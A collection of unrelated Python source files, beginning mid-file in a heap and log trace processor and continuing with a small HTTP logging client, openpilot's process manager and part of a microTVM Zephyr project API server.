path to ELF file to retrieve format strings for log messages
"""
if len(elf_path):
self.felf = elffile.ELFFile(open(elf_path, 'rb'))
else:
self.felf = None
self.print_log_events = print_log_events
self.messages = []
def cleanup(self):
"""
Cleanup
"""
if self.felf:
self.felf.stream.close()
def print_report(self):
"""
Prints log report
"""
print("=============== LOG TRACE REPORT ===============")
print("Processed {:d} log messages.".format(len(self.messages)))
def on_new_event(self, event):
"""
Processes log events.
Parameters
----------
event : LogTraceEvent
Event object.
"""
msg = event.get_message(self.felf)
self.messages.append(msg)
if self.print_log_events:
print(msg),
class HeapTraceParseError(ParseError):
"""
Heap trace parse error exception.
"""
pass
class HeapTraceDuplicateAllocError(HeapTraceParseError):
"""
Heap trace duplicate allocation error exception.
"""
def __init__(self, addr, new_size, prev_size):
"""
Constructor.
Parameters
----------
addr : int
memory block address
new_size : int
size of the new allocation
prev_size : int
size of the previous allocation
"""
HeapTraceParseError.__init__(self, """Duplicate alloc @ 0x{:x}!
New alloc is {:d} bytes,
previous is {:d} bytes.""".format(addr, new_size, prev_size))
class HeapTraceEvent:
"""
Heap trace event.
"""
def __init__(self, ctx_name, in_irq, core_id, ts, alloc, size, addr, callers, toolchain='', elf_path=''):
"""
Constructor.
Parameters
----------
ctx_name : string
name of event context (task or IRQ name)
in_irq : bool
True if event has been generated in IRQ context, otherwise False
core_id : int
core which generated the event
ts : float
event timestamp
alloc : bool
True for allocation event, otherwise False
size : int
size of allocation; has no meaning for de-allocation event
addr : int
address of allocation/de-allocation
callers : list
list of callers (callstack) for event
        toolchain : string
            toolchain prefix to retrieve source line locations using addresses
        elf_path : string
            path to ELF file used to resolve caller addresses to source line locations
"""
self.ctx_name = ctx_name
self.in_irq = in_irq
self.core_id = core_id
self.ts = ts
self.alloc = alloc
self.size = size
self.addr = addr
self.callers = callers
self.toolchain = toolchain
self.elf_path = elf_path
def __repr__(self):
if len(self.toolchain) and len(self.elf_path):
callers = os.linesep
for addr in self.callers:
callers += '{}'.format(addr2line(self.toolchain, self.elf_path, addr))
else:
callers = ''
for addr in self.callers:
if len(callers):
callers += ':'
callers += '0x{:x}'.format(addr)
if self.in_irq:
ctx_desc = 'IRQ "%s"' % self.ctx_name
else:
ctx_desc = 'task "%s"' % self.ctx_name
if self.alloc:
return "[{:.9f}] HEAP: Allocated {:d} bytes @ 0x{:x} from {} on core {:d} by: {}".format(self.ts, self.size,
self.addr, ctx_desc,
self.core_id, callers)
else:
return "[{:.9f}] HEAP: Freed bytes @ 0x{:x} from {} on core {:d} by: {}".format(self.ts, self.addr, ctx_desc,
self.core_id, callers)
class BaseHeapTraceDataProcessorImpl:
"""
Base implementation for heap data processors.
"""
def __init__(self, print_heap_events=False):
"""
Constructor.
Parameters
----------
print_heap_events : bool
if True every heap event will be printed as they arrive
"""
self._alloc_addrs = {}
self.allocs = []
self.frees = []
self.heap_events_count = 0
self.print_heap_events = print_heap_events
def on_new_event(self, event):
"""
Processes heap events. Keeps track of active allocations list.
Parameters
----------
event : HeapTraceEvent
Event object.
"""
self.heap_events_count += 1
if self.print_heap_events:
print(event)
if event.alloc:
if event.addr in self._alloc_addrs:
raise HeapTraceDuplicateAllocError(event.addr, event.size, self._alloc_addrs[event.addr].size)
self.allocs.append(event)
self._alloc_addrs[event.addr] = event
else:
            # do not treat frees at unknown addresses as errors, because these blocks could have been allocated while tracing was disabled
if event.addr in self._alloc_addrs:
event.size = self._alloc_addrs[event.addr].size
self.allocs.remove(self._alloc_addrs[event.addr])
del self._alloc_addrs[event.addr]
else:
self.frees.append(event)
def print_report(self):
"""
Prints heap report
"""
print("=============== HEAP TRACE REPORT ===============")
print("Processed {:d} heap events.".format(self.heap_events_count))
if len(self.allocs) == 0:
print("OK - Heap errors was not found.")
return
leaked_bytes = 0
for alloc in self.allocs:
leaked_bytes += alloc.size
print(alloc)
for free in self.frees:
if free.addr > alloc.addr and free.addr <= alloc.addr + alloc.size:
print("Possible wrong free operation found")
print(free)
print("Found {:d} leaked bytes in {:d} blocks.".format(leaked_bytes, len(self.allocs)))
|
isulogger.py
|
"""
ISULOG client
"""
from __future__ import annotations
import json
import time
import urllib.parse
import sys
import requests
import threading
from queue import Queue
class IsuLogger:
def __init__(self, endpoint, appID):
self.endpoint = endpoint
self.appID = appID
self.queue = Queue()
self.logs = []
self.thread = threading.Thread(target=self._send_bulk)
self.thread.start()
def send(self, tag, data):
self.queue.put(
{
"tag": tag,
"time": time.strftime("%Y-%m-%dT%H:%M:%S+09:00"),
"data": data,
}
)
def _send_bulk(self):
while True:
while not self.queue.empty():
self.logs.append(self.queue.get())
if self.logs:
try:
self._request("/send_bulk", self.logs)
except Exception as e:
print(f"Catch bulk error {e}", file=sys.stderr)
else:
self.logs = []
time.sleep(2)
def _request(self, path, data):
url = urllib.parse.urljoin(self.endpoint, path)
body = json.dumps(data)
headers = {
"Content-Type": "application/json",
"Authorization": "Bearer " + self.appID,
}
res = requests.post(url, data=body, headers=headers)
res.raise_for_status()
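# Illustrative usage sketch (added, not part of the original module). The endpoint and app
# ID are assumptions; note that constructing IsuLogger starts a background thread which
# flushes the queue to /send_bulk roughly every two seconds.
def _example_isulogger():
    logger = IsuLogger("http://localhost:8080", "hypothetical-app-id")
    logger.send("signup", {"user_id": 1, "name": "alice"})
    # the entry is queued immediately and POSTed in bulk by the background thread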
|
manager.py
|
#!/usr/bin/env python3.7
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
from common.basedir import BASEDIR, PARAMS
from common.android import ANDROID
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1195
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
os._exit(os.wait()[1])
if __name__ == "__main__":
unblock_stdout()
from common.spinner import Spinner
else:
from common.spinner import FakeSpinner as Spinner
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner()
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline()
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (50.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
print(line.decode('utf8'))
except Exception:
pass
if scons.returncode != 0:
if retry:
print("scons build failed, cleaning in")
for i in range(3,-1,-1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache")
else:
raise RuntimeError("scons build failed")
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.swaglog import cloudlog
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common import android
from common.apk import update_apks, pm_apply_packages, start_frame
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald",
#"uploader": "selfdrive.loggerd.uploader",
#"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.controls.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
#"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
#"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
#"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": ("selfdrive/locationd", ["./paramsd"]),
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
#"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord', 'paramsd']
# processes to end if thermal conditions exceed Green parameters
green_temp_processes = ['uploader']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
]
if ANDROID:
persistent_processes += [
'logcatd',
'tombstoned',
'updated',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'dmonitoringd',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'ubloxd',
'locationd',
]
if ANDROID:
car_started_processes += [
'sensord',
'clocksd',
'gpsd',
'dmonitoringmodeld',
'deleter',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
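# Illustrative sketch (added, not part of the original file): how an external module could
# register its own process with the manager. The names and module path are assumptions.
def _example_register_custom_process():
  # a pure-python process started with the car rather than persistently
  register_managed_process("mycontrolsd", "selfdrive.contrib.mycontrolsd", car_started=True)
  # native processes are registered as a (directory, [command]) tuple instead
  register_managed_process("myloggerd", ("selfdrive/contrib", ["./myloggerd"]))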
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc],
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id, dongle_secret = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start frame
if ANDROID:
pm_apply_packages('enable')
start_frame()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
logger_dead = False
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
# heavyweight batch processes are gated on favorable thermal conditions
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
for p in green_temp_processes:
if p in persistent_processes:
kill_managed_process(p)
else:
for p in green_temp_processes:
if p in persistent_processes:
start_managed_process(p)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in reversed(car_started_processes):
kill_managed_process(p)
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
  # the scons step above already advanced the spinner to 50, so continue from there
total = 100.0 if prebuilt else 50.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
android.reboot(reason="recovery")
def main():
os.environ['PARAMS_PATH'] = PARAMS
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
# set unset params
if params.get("CommunityFeaturesToggle") is None:
params.put("CommunityFeaturesToggle", "0")
if params.get("CompletedTrainingVersion") is None:
params.put("CompletedTrainingVersion", "0")
if params.get("IsMetric") is None:
params.put("IsMetric", "0")
if params.get("RecordFront") is None:
params.put("RecordFront", "0")
if params.get("HasAcceptedTerms") is None:
params.put("HasAcceptedTerms", "0")
if params.get("HasCompletedSetup") is None:
params.put("HasCompletedSetup", "0")
if params.get("IsUploadRawEnabled") is None:
params.put("IsUploadRawEnabled", "1")
if params.get("IsLdwEnabled") is None:
params.put("IsLdwEnabled", "1")
if params.get("IsGeofenceEnabled") is None:
params.put("IsGeofenceEnabled", "-1")
if params.get("SpeedLimitOffset") is None:
params.put("SpeedLimitOffset", "0")
if params.get("LongitudinalControl") is None:
params.put("LongitudinalControl", "0")
if params.get("LimitSetSpeed") is None:
params.put("LimitSetSpeed", "0")
if params.get("LimitSetSpeedNeural") is None:
params.put("LimitSetSpeedNeural", "0")
if params.get("LastUpdateTime") is None:
t = datetime.datetime.now().isoformat()
params.put("LastUpdateTime", t.encode('utf8'))
if params.get("OpenpilotEnabledToggle") is None:
params.put("OpenpilotEnabledToggle", "1")
if params.get("LaneChangeEnabled") is None:
params.put("LaneChangeEnabled", "1")
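  # A table-driven equivalent of the default-parameter block above, shown as an
  # illustrative sketch only (commented out, not part of the running code). The
  # key names are the same ones used above; only a few are listed.
  #
  #   default_params = {
  #     "CommunityFeaturesToggle": "0",
  #     "HasAcceptedTerms": "0",
  #     "IsUploadRawEnabled": "1",
  #     "OpenpilotEnabledToggle": "1",
  #   }
  #   for k, v in default_params.items():
  #     if params.get(k) is None:
  #       params.put(k, v)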
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
main()
# manual exit because we are forked
sys.exit(0)
|
microtvm_api_server.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import atexit
import collections
import collections.abc
import copy
import enum
import fcntl
import logging
import os
import os.path
import pathlib
import queue
import re
import select
import shlex
import shutil
import subprocess
import sys
import tarfile
import tempfile
import threading
import time
import serial
import serial.tools.list_ports
import yaml
from tvm.micro.project_api import server
_LOG = logging.getLogger(__name__)
API_SERVER_DIR = pathlib.Path(os.path.dirname(__file__) or os.getcwd())
BUILD_DIR = API_SERVER_DIR / "build"
MODEL_LIBRARY_FORMAT_RELPATH = "model.tar"
IS_TEMPLATE = not (API_SERVER_DIR / MODEL_LIBRARY_FORMAT_RELPATH).exists()
def check_call(cmd_args, *args, **kwargs):
cwd_str = "" if "cwd" not in kwargs else f" (in cwd: {kwargs['cwd']})"
_LOG.info("run%s: %s", cwd_str, " ".join(shlex.quote(a) for a in cmd_args))
return subprocess.check_call(cmd_args, *args, **kwargs)
CACHE_ENTRY_RE = re.compile(r"(?P<name>[^:]+):(?P<type>[^=]+)=(?P<value>.*)")
CMAKE_BOOL_MAP = dict(
[(k, True) for k in ("1", "ON", "YES", "TRUE", "Y")]
+ [(k, False) for k in ("0", "OFF", "NO", "FALSE", "N", "IGNORE", "NOTFOUND", "")]
)
class CMakeCache(collections.abc.Mapping):
def __init__(self, path):
self._path = path
self._dict = None
    def __iter__(self):
        if self._dict is None:
            self._dict = self._read_cmake_cache()
        return iter(self._dict)
    def __getitem__(self, key):
        if self._dict is None:
            self._dict = self._read_cmake_cache()
        return self._dict[key]
    def __len__(self):
        if self._dict is None:
            self._dict = self._read_cmake_cache()
        return len(self._dict)
def _read_cmake_cache(self):
"""Read a CMakeCache.txt-like file and return a dictionary of values."""
entries = collections.OrderedDict()
with open(self._path, encoding="utf-8") as f:
for line in f:
m = CACHE_ENTRY_RE.match(line.rstrip("\n"))
if not m:
continue
if m.group("type") == "BOOL":
value = CMAKE_BOOL_MAP[m.group("value").upper()]
else:
value = m.group("value")
entries[m.group("name")] = value
return entries
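# Illustrative sketch (comments only, not executed): _read_cmake_cache() parses
# "NAME:TYPE=VALUE" lines, mapping BOOL entries through CMAKE_BOOL_MAP. Assuming
# a build/CMakeCache.txt containing, for example:
#
#   BOARD:STRING=nucleo_f746zg
#   ZEPHYR_BOARD_FLASH_RUNNER:STRING=openocd
#   CMAKE_VERBOSE_MAKEFILE:BOOL=OFF
#
# lookups would behave like:
#
#   cache = CMakeCache(BUILD_DIR / "CMakeCache.txt")
#   cache["BOARD"]                            # -> "nucleo_f746zg"
#   cache["CMAKE_VERBOSE_MAKEFILE"]           # -> False (via CMAKE_BOOL_MAP)
#   cache.get("ZEPHYR_BOARD_FLASH_RUNNER")    # -> "openocd" (Mapping.get via __getitem__)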
CMAKE_CACHE = CMakeCache(BUILD_DIR / "CMakeCache.txt")
class BoardError(Exception):
"""Raised when an attached board cannot be opened (i.e. missing /dev nodes, etc)."""
class BoardAutodetectFailed(Exception):
    """Raised when no attached hardware is found matching the board= given to ZephyrCompiler."""
class FlashRunnerNotSupported(Exception):
    """Raised when the CMake cache names a flash runner this script does not know how to use."""
def _get_flash_runner():
flash_runner = CMAKE_CACHE.get("ZEPHYR_BOARD_FLASH_RUNNER")
if flash_runner is not None:
return flash_runner
with open(CMAKE_CACHE["ZEPHYR_RUNNERS_YAML"]) as f:
doc = yaml.load(f, Loader=yaml.FullLoader)
return doc["flash-runner"]
def _get_device_args(options):
flash_runner = _get_flash_runner()
if flash_runner == "nrfjprog":
return _get_nrf_device_args(options)
if flash_runner == "openocd":
return _get_openocd_device_args(options)
raise BoardError(
f"Don't know how to find serial terminal for board {CMAKE_CACHE['BOARD']} with flash "
f"runner {flash_runner}"
)
# kwargs passed to usb.core.find to find attached boards for the openocd flash runner.
BOARD_USB_FIND_KW = {
"nucleo_l4r5zi": {"idVendor": 0x0483, "idProduct": 0x374B},
"nucleo_f746zg": {"idVendor": 0x0483, "idProduct": 0x374B},
"stm32f746g_disco": {"idVendor": 0x0483, "idProduct": 0x374B},
}
def openocd_serial(options):
"""Find the serial port to use for a board with OpenOCD flash strategy."""
if "openocd_serial" in options:
return options["openocd_serial"]
import usb # pylint: disable=import-outside-toplevel
find_kw = BOARD_USB_FIND_KW[CMAKE_CACHE["BOARD"]]
boards = usb.core.find(find_all=True, **find_kw)
serials = []
for b in boards:
serials.append(b.serial_number)
if len(serials) == 0:
raise BoardAutodetectFailed(f"No attached USB devices matching: {find_kw!r}")
serials.sort()
autodetected_openocd_serial = serials[0]
_LOG.debug("zephyr openocd driver: autodetected serial %s", serials[0])
return autodetected_openocd_serial
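# Illustrative sketch (comments only, not executed): resolving the OpenOCD serial
# number for a generated project. The serial value below is a made-up placeholder,
# and autodetection assumes a configured build directory so CMAKE_CACHE["BOARD"]
# resolves.
#
#   openocd_serial({"openocd_serial": "066DFF303435"})  # returned as-is
#   openocd_serial({})  # USB autodetect via BOARD_USB_FIND_KW;
#                       # raises BoardAutodetectFailed when nothing matches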
def _get_openocd_device_args(options):
return ["--serial", openocd_serial(options)]
def _get_nrf_device_args(options):
nrfjprog_args = ["nrfjprog", "--ids"]
nrfjprog_ids = subprocess.check_output(nrfjprog_args, encoding="utf-8")
if not nrfjprog_ids.strip("\n"):
raise BoardAutodetectFailed(f'No attached boards recognized by {" ".join(nrfjprog_args)}')
boards = nrfjprog_ids.split("\n")[:-1]
if len(boards) > 1:
if options["nrfjprog_snr"] is None:
raise BoardError(
"Multiple boards connected; specify one with nrfjprog_snr=: " f'{", ".join(boards)}'
)
if str(options["nrfjprog_snr"]) not in boards:
raise BoardError(
f"nrfjprog_snr ({options['nrfjprog_snr']}) not found in {nrfjprog_args}: {boards}"
)
return ["--snr", options["nrfjprog_snr"]]
if not boards:
return []
return ["--snr", boards[0]]
PROJECT_TYPES = []
if IS_TEMPLATE:
for d in (API_SERVER_DIR / "src").iterdir():
if d.is_dir():
PROJECT_TYPES.append(d.name)
PROJECT_OPTIONS = [
    server.ProjectOption(
        "extra_files_tar",
        help="If given, during generate_project, uncompress the tarball at this path into the project dir",
    ),
server.ProjectOption(
"gdbserver_port", help=("If given, port number to use when running the local gdbserver")
),
server.ProjectOption(
"nrfjprog_snr",
help=(
"When used with nRF targets, serial # of the " "attached board to use, from nrfjprog"
),
),
server.ProjectOption(
"openocd_serial",
help=("When used with OpenOCD targets, serial # of the " "attached board to use"),
),
server.ProjectOption(
"project_type",
help="Type of project to generate.",
choices=tuple(PROJECT_TYPES),
),
server.ProjectOption("verbose", help="Run build with verbose output"),
server.ProjectOption(
"west_cmd",
help=(
"Path to the west tool. If given, supersedes both the zephyr_base "
"option and ZEPHYR_BASE environment variable."
),
),
server.ProjectOption("zephyr_base", help="Path to the zephyr base directory."),
server.ProjectOption("zephyr_board", help="Name of the Zephyr board to build for"),
]
class Handler(server.ProjectAPIHandler):
    def __init__(self):
        super(Handler, self).__init__()
        self._proc = None
        self._transport = None
def server_info_query(self, tvm_version):
return server.ServerInfo(
platform_name="zephyr",
is_template=IS_TEMPLATE,
model_library_format_path=""
if IS_TEMPLATE
else (API_SERVER_DIR / MODEL_LIBRARY_FORMAT_RELPATH),
project_options=PROJECT_OPTIONS,
)
# These files and directories will be recursively copied into generated projects from the CRT.
CRT_COPY_ITEMS = ("include", "Makefile", "src")
# Maps extra line added to prj.conf to a tuple or list of zephyr_board for which it is needed.
EXTRA_PRJ_CONF_DIRECTIVES = {
"CONFIG_TIMER_RANDOM_GENERATOR=y": (
"qemu_x86",
"qemu_riscv32",
"qemu_cortex_r5",
"qemu_riscv64",
),
"CONFIG_ENTROPY_GENERATOR_BOARDS=y": (
"mps2_an521",
"nrf5340dk_nrf5340_cpuapp",
"nucleo_f746zg",
"nucleo_l4r5zi",
"stm32f746g_disco",
),
}
def _create_prj_conf(self, project_dir, options):
with open(project_dir / "prj.conf", "w") as f:
f.write(
"# For UART used from main().\n"
"CONFIG_RING_BUFFER=y\n"
"CONFIG_UART_CONSOLE=n\n"
"CONFIG_UART_INTERRUPT_DRIVEN=y\n"
"\n"
)
f.write("# For TVMPlatformAbort().\n" "CONFIG_REBOOT=y\n" "\n")
if options["project_type"] == "host_driven":
f.write("# For RPC server C++ bindings.\n" "CONFIG_CPLUSPLUS=y\n" "\n")
f.write("# For math routines\n" "CONFIG_NEWLIB_LIBC=y\n" "\n")
if self._has_fpu(options["zephyr_board"]):
f.write("# For models with floating point.\n" "CONFIG_FPU=y\n" "\n")
main_stack_size = None
if self._is_qemu(options) and options["project_type"] == "host_driven":
main_stack_size = 1536
# Set main stack size, if needed.
if main_stack_size is not None:
f.write(f"CONFIG_MAIN_STACK_SIZE={main_stack_size}\n")
f.write("# For random number generation.\n" "CONFIG_TEST_RANDOM_GENERATOR=y\n")
            f.write("\n# Extra prj.conf directives\n")
for line, board_list in self.EXTRA_PRJ_CONF_DIRECTIVES.items():
if options["zephyr_board"] in board_list:
f.write(f"{line}\n")
f.write("\n")
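    # Illustrative sketch (comments only): for a hypothetical host_driven project on a
    # non-QEMU board with an FPU, the prj.conf written above would contain roughly:
    #
    #   # For UART used from main().
    #   CONFIG_RING_BUFFER=y
    #   CONFIG_UART_CONSOLE=n
    #   CONFIG_UART_INTERRUPT_DRIVEN=y
    #
    #   # For TVMPlatformAbort().
    #   CONFIG_REBOOT=y
    #
    #   # For RPC server C++ bindings.
    #   CONFIG_CPLUSPLUS=y
    #
    #   # For math routines
    #   CONFIG_NEWLIB_LIBC=y
    #
    #   # For models with floating point.
    #   CONFIG_FPU=y
    #
    #   # For random number generation.
    #   CONFIG_TEST_RANDOM_GENERATOR=y
    #
    # plus CONFIG_MAIN_STACK_SIZE and any EXTRA_PRJ_CONF_DIRECTIVES lines when the
    # selected board calls for them.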
API_SERVER_CRT_LIBS_TOKEN = "<API_SERVER_CRT_LIBS>"
CRT_LIBS_BY_PROJECT_TYPE = {
"host_driven": "microtvm_rpc_server microtvm_rpc_common common",
"aot_demo": "aot_executor memory microtvm_rpc_common common",
}
